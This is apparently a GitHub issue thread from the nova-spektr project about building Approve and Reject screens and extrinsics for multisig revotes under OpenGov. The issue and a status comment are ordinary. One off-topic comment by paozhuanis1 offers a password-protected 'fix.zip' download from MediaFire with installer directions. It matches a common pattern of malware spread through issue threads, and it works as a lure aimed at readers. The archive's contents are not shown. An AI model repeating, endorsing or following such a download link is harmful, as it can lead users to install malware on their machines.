### ISSUE TITLE
OpenGov. Revote. Revote Multisig Approve, Reject

### ISSUE THREAD

**Issue by pgolovkin** [novasamatech/nova-spektr#2211]
OpenGov. Revote. Revote Multisig Approve, Reject Multisig Approve, Reject

- [x] Approve, Reject screen
- [ ] Approve, Reject extrinsic

The list of attributes for the screen is listed in the [doc](https://docs.google.com/document/d/1oB7pX_tgBJJD4YI_pSjIwVmSHb7J1la-njYrNPYDmpc/edit#heading=h.injxpefpjlvp)

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by stepanLav** [comment]
Status verification: ✅
